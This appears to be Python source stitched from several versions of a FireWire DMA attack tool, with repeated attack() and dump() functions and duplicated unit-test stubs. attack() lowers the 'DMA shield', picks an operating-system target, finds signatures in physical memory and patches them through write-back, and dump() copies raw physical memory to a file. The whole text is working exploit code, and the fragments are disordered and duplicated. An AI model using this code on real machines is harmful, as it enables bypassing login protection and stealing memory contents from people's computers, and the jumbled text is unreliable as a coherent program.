def dump(start, end, path):
# Make sure that the right mode is set
settings.memdump = True
# Initialize and lower DMA shield
if not settings.filemode:
fw = FireWire()
starttime = time.time()
device_index = fw.select_device()
# Print selection
msg('*', 'Selected device: {0}'.format(fw.vendors[device_index]))
# Lower DMA shield or use a file as input
device = None
if settings.filemode:
device = MemoryFile(settings.filename, settings.PAGESIZE)
else:
elapsed = int(time.time() - starttime)
device = fw.getdevice(device_index, elapsed)
requestsize = settings.max_request_size
size = end - start
#filename = 'memdump_{0}-{1}.bin'.format(hex(start), hex(end))
#path added for Pac4Mac
filename = path
file = open(filename, 'wb')
msg('*', 'Dumping from {0:#x} to {1:#x}, a total of {2} MiB'.format(start, end, size/settings.MiB))
try:
for i in range(start, end, requestsize):
# Avoid accessing upper memory area if we are using FireWire
if needtoavoid(i):
data = b'\x00' * requestsize
else:
data = device.read(i, requestsize)
file.write(data)
# Print status
dumped = (i - start) // settings.MiB
sys.stdout.write('[*] Dumping memory, {0:>4d} MiB so far'.format(dumped))
if settings.verbose:
sys.stdout.write('. Sample data read: {0}'.format(bytes2hexstr(data)[0:24]))
sys.stdout.write('\r')
sys.stdout.flush()
file.close()
print() # Filler
msg('*', 'Dumped memory to file {0}'.format(filename))
device.close()
except KeyboardInterrupt:
file.close()
print()
msg('*', 'Dumped memory to file {0}'.format(filename))
raise KeyboardInterrupt
class TestUtil(unittest.TestCase):
def setUp(self):
self.fw = FireWire()
def tearDown(self):
pass
def test_init_OUI(self):
self.assertIsInstance(self.fw.oui, dict)
# Test a couple of OUIs
self.assertEqual(self.fw.resolve_oui(0x03), 'XEROX CORPORATION')
self.assertEqual(self.fw.resolve_oui(0xE0C1),
'MEMOREX TELEX JAPAN, LTD.')
self.assertEqual(self.fw.resolve_oui(0xFCFBFB), 'Cisco Systems')
class TestUtil(unittest.TestCase):
def setUp(self):
self.fw = FireWire()
def tearDown(self):
pass
def test_init_OUI(self):
self.assertIsInstance(self.fw.oui, dict)
# Test a couple of OUIs
self.assertEqual(self.fw.resolve_oui(0x03), 'XEROX CORPORATION')
self.assertEqual(self.fw.resolve_oui(0xE0C1), 'MEMOREX TELEX JAPAN, LTD.')
self.assertEqual(self.fw.resolve_oui(0xFCFBFB), 'Cisco Systems')
def setUp(self):
self.fw = FireWire()
def attack(targets):
'''
Main attack logic
'''
# Initialize and lower DMA shield
if not cfg.filemode:
try:
fw = FireWire()
except IOError:
fail('Could not initialize FireWire. Are the modules loaded into ' +
'the kernel?')
start = time.time()
device_index = fw.select_device()
# Print selection
info('Selected device: {0}'.format(fw.vendors[device_index]))
# List targets
list_targets(targets)
# Select target
target = select_target(targets)
# Print selection. If verbose, print selection with signatures
info('Selected target: ' + target['OS'] + ': ' + target['name'])
if cfg.verbose:
printdetails(target)
# Lower DMA shield or use a file as input, and set memsize
device = None
memsize = None
if cfg.filemode:
device = MemoryFile(cfg.filename, cfg.PAGESIZE)
memsize = os.path.getsize(cfg.filename)
else:
elapsed = int(time.time() - start)
device = fw.getdevice(device_index, elapsed)
memsize = cfg.memsize
# Perform parallel search for all signatures for each OS at the known
# offsets
info('DMA shields should be down by now. Attacking...')
address, chunks = searchanddestroy(device, target, memsize)
if not address:
# TODO: Fall-back sequential search?
return None, None
# Signature found, let's patch
mask = 0xfffff000 # Mask away the lower bits to find the page number
page = int((address & mask) / cfg.PAGESIZE)
info('Signature found at {0:#x} (in page # {1})'.format(address, page))
if not cfg.dry_run:
success = patch(device, address, chunks)
if success:
info('Write-back verified; patching successful')
if cfg.egg:
sound.play('data/inception.wav')
info('BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!')
else:
warn('Write-back could not be verified; patching *may* have been ' +
'unsuccessful')
#Clean up
device.close()
return address, page
def setUp(self):
self.fw = FireWire()
def dump(start, end):
# Make sure that the right mode is set
cfg.memdump = True
requestsize = cfg.max_request_size
size = end - start
# Open file for writing
filename = '{0}_{1}-{2}.bin'.format(cfg.memdump_prefix, hex(start),
hex(end))
file = open(filename, 'wb')
# Ensure correct denomination
if size % cfg.GiB == 0:
s = '{0} GiB'.format(size // cfg.GiB)
elif size % cfg.MiB == 0:
s = '{0} MiB'.format(size // cfg.MiB)
else:
s = '{0} KiB'.format(size // cfg.KiB)
info('Dumping from {0:#x} to {1:#x}, a total of {2}'.format(start, end, s))
# Initialize and lower DMA shield
if not cfg.filemode:
fw = FireWire()
starttime = time.time()
device_index = fw.select_device()
# Print selection
info('Selected device: {0}'.format(fw.vendors[device_index]))
# Lower DMA shield or use a file as input
device = None
if cfg.filemode:
device = MemoryFile(cfg.filename, cfg.PAGESIZE)
else:
elapsed = int(time.time() - starttime)
device = fw.getdevice(device_index, elapsed)
# Progress bar
prog = ProgressBar(min_value=start,
max_value=end,
total_width=cfg.termwidth,
print_data=cfg.verbose)
try:
for i in range(start, end, requestsize):
# Edge case, make sure that we don't read beyond the end
if i + requestsize > end:
requestsize = end - i
# Avoid accessing upper memory area if we are using FireWire
if needtoavoid(i):
data = b'\x00' * requestsize
else:
data = device.read(i, requestsize)
file.write(data)
# Print status
prog.update_amount(i + requestsize, data)
prog.draw()
file.close()
print() # Filler
info('Dumped memory to file {0}'.format(filename))
device.close()
except KeyboardInterrupt:
file.close()
print()
info('Dumped memory to file {0}'.format(filename))
raise KeyboardInterrupt
def attack(targets):
'''
Main attack logic
'''
# Initialize and lower DMA shield
if not settings.filemode:
try:
fw = FireWire()
except IOError:
fail(
'Could not initialize FireWire. Are the modules loaded into the kernel?'
)
start = time.time()
device_index = fw.select_device()
# Print selection
msg('*', 'Selected device: {0}'.format(fw.vendors[device_index]))
# List targets
msg('*', 'Available targets:')
separator()
for number, target in enumerate(targets, 1):
msg(number, target['OS'] + ': ' + target['name'])
separator()
# Select target
target = select_target(targets)
# Print selection. If verbose, print selection with signatures
msg('*', 'Selected target: ' + target['OS'] + ': ' + target['name'])
if settings.verbose:
printdetails(target)
# Lower DMA shield or use a file as input, and set memsize
device = None
memsize = None
if settings.filemode:
device = MemoryFile(settings.filename, settings.PAGESIZE)
memsize = os.path.getsize(settings.filename)
else:
elapsed = int(time.time() - start)
device = fw.getdevice(device_index, elapsed)
memsize = settings.memsize
# Perform parallel search for all signatures for each OS at the known offsets
msg('*', 'DMA shields down. Attacking...')
address, chunks = searchanddestroy(device, target, memsize)
if not address:
# TODO: Fall-back sequential search?
return None, None
# Signature found, let's patch
mask = 0xfffff000 # Mask away the lower bits to find the page number
page = int((address & mask) / settings.PAGESIZE)
msg('*', 'Signature found at {0:#x} (@page # {1})'.format(address, page))
if not settings.dry_run:
success = patch(device, address, chunks)
if success:
msg('*', 'Write-back verified; patching successful')
msg('*', 'BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!')
else:
msg(
'!',
'Write-back could not be verified; patching may have been unsuccessful.'
)
#Clean up
device.close()
return address, page
def dump(start, end):
# Make sure that the right mode is set
cfg.memdump = True
requestsize = cfg.max_request_size
size = end - start
# Open file for writing
filename = '{0}_{1}-{2}.bin'.format(cfg.memdump_prefix,
hex(start), hex(end))
file = open(filename, 'wb')
# Ensure correct denomination
if size % cfg.GiB == 0:
s = '{0} GiB'.format(size//cfg.GiB)
elif size % cfg.MiB == 0:
s = '{0} MiB'.format(size//cfg.MiB)
else:
s = '{0} KiB'.format(size//cfg.KiB)
info('Dumping from {0:#x} to {1:#x}, a total of {2}'.format(start, end, s))
# Initialize and lower DMA shield
if not cfg.filemode:
fw = FireWire()
starttime = time.time()
device_index = fw.select_device()
# Print selection
info('Selected device: {0}'.format(fw.vendors[device_index]))
# Lower DMA shield or use a file as input
device = None
if cfg.filemode:
device = MemoryFile(cfg.filename, cfg.PAGESIZE)
else:
elapsed = int(time.time() - starttime)
device = fw.getdevice(device_index, elapsed)
# Progress bar
prog = ProgressBar(min_value = start, max_value = end,
total_width = cfg.termwidth, print_data = cfg.verbose)
try:
for i in range(start, end, requestsize):
# Edge case, make sure that we don't read beyond the end
if i + requestsize > end:
requestsize = end - i
# Avoid accessing upper memory area if we are using FireWire
if needtoavoid(i):
data = b'\x00' * requestsize
else:
data = device.read(i, requestsize)
file.write(data)
# Print status
prog.update_amount(i + requestsize, data)
prog.draw()
file.close()
print() # Filler
info('Dumped memory to file {0}'.format(filename))
device.close()
except KeyboardInterrupt:
file.close()
print()
info('Dumped memory to file {0}'.format(filename))
raise KeyboardInterrupt
def attack(targets):
'''
Main attack logic
'''
# Initialize and lower DMA shield
if not settings.filemode:
try:
fw = FireWire()
except IOError:
fail('Could not initialize FireWire. Are the modules loaded into the kernel?')
start = time.time()
device_index = fw.select_device()
# Print selection
msg('*', 'Selected device: {0}'.format(fw.vendors[device_index]))
# List targets
msg('*', 'Available targets:')
separator()
for number, target in enumerate(targets, 1):
msg(number, target['OS'] + ': ' + target['name'])
separator()
# Select target
target = select_target(targets)
# Print selection. If verbose, print selection with signatures
msg('*', 'Selected target: ' + target['OS'] + ': ' + target['name'])
if settings.verbose:
printdetails(target)
# Lower DMA shield or use a file as input, and set memsize
device = None
memsize = None
if settings.filemode:
device = MemoryFile(settings.filename, settings.PAGESIZE)
memsize = os.path.getsize(settings.filename)
else:
elapsed = int(time.time() - start)
device = fw.getdevice(device_index, elapsed)
memsize = settings.memsize
# Perform parallel search for all signatures for each OS at the known offsets
msg('*', 'DMA shields down. Attacking...')
address, chunks = searchanddestroy(device, target, memsize)
if not address:
# TODO: Fall-back sequential search?
return None, None
# Signature found, let's patch
mask = 0xfffff000 # Mask away the lower bits to find the page number
page = int((address & mask) / settings.PAGESIZE)
msg('*', 'Signature found at {0:#x} (@page # {1})'.format(address, page))
if not settings.dry_run:
success = patch(device, address, chunks)
if success:
msg('*', 'Write-back verified; patching successful')
msg('*', 'BRRRRRRRAAAAAWWWWRWRRRMRMRMMRMRMMMMM!!!')
else:
msg('!', 'Write-back could not be verified; patching may have been unsuccessful.')
#Clean up
device.close()
return address, page
